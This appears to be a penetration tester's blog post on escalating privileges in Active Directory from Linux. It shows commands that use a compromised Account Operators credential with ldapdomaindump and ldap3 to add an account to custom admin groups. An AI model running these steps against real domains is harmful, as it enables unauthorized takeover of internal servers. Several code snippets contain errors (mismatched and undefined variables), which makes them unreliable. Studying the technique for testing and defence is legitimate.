I recently came across a peculiar scenario that caused me to have to think a little outside the box.
I was able to obtain credentials for an account that was part of the “Account Operators” group. Here is Microsoft’s description of that group:
The Account Operators group grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers.
Members of the Account Operators group cannot manage the Administrator user account, the user accounts of administrators, or the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Members of this group cannot modify user rights.
While they cannot directly modify the group membership of administrators or built in administrative groups, the can modify any other group. It is not uncommon for Active Directory administrators to create groups outside of the default admin groups, and grant them administrative privileges. These group we can modify as an Account Operator.
While this is easy to do with Active Directory Users and Computers, I had no such access. I did not have shell access on a single Windows machine. While Account Operators can log onto Domain Controllers locally, that does not include Remote Desktop. I had to modify Active Directory group membership using only Linux.
My first course of action was to extract as much domain information as I could using ldapdomaindump.
You use it like so:
ldapdomaindump -u DOMAIN\\USER -p PASSWORD DC
I will then run:
cat domain_groups.json | grep dn
To get all of the Distinguished Names (DN) for all of the groups.
Based on the Common Name (CN) you should be able to get an idea about what the group does, and if it might grant additional rights.
To actually modify those groups, you can use the ldap3 library.
pip install ldap3
After you have that installed, run python.
>>> import ldap3 >>> user = "USERNAME" >>> password = 'PASSWORD' >>> server = ldap3.Server('DOMAIN') >>> connection = ldap3.Connection(server, user=user, password=password) >>> connection.bind()
After that is successful, you can now start modifying groups. You will also need the DN of the user account you wish to add ot the group, and you can get that from the LDAP dump also.
Put the user DN and group DN into a variable:
>>> user_dn = 'USER_DN'
>> groups_dn = "GROUP_DN"
Then use this import:
>>> from ldap3.extend.microsoft.addMembersToGroups import ad_add_members_to_groups as addUsersInGroups
Then you can run:
>> addUsersInGroups(connection, user_dn, group_dn)
This should now add that user to the specified group. If it fails, it will return False. This means you don’t have permission to modify that group, so try a different one.
To validate that the user was added, you can get a full listing of all that user’s groups by running:
>>> connection.search(search_base='DC=DOMAIN,DC=com', search_filter='(&(objectClass=user)(userPrincipalName='+user+'))', search_scope='SUBTREE', attributes='*')
With the user variable corresponding to the username.
>>> for memb in attrs['memberOf']: print(memb.partition('=').partition(','))
This should then print out all the groups that account is a member of. Your newly added group should be in that list.
In my case, I was able to add the compromised account to multiple custom groups, which gave me local admin on most internal servers.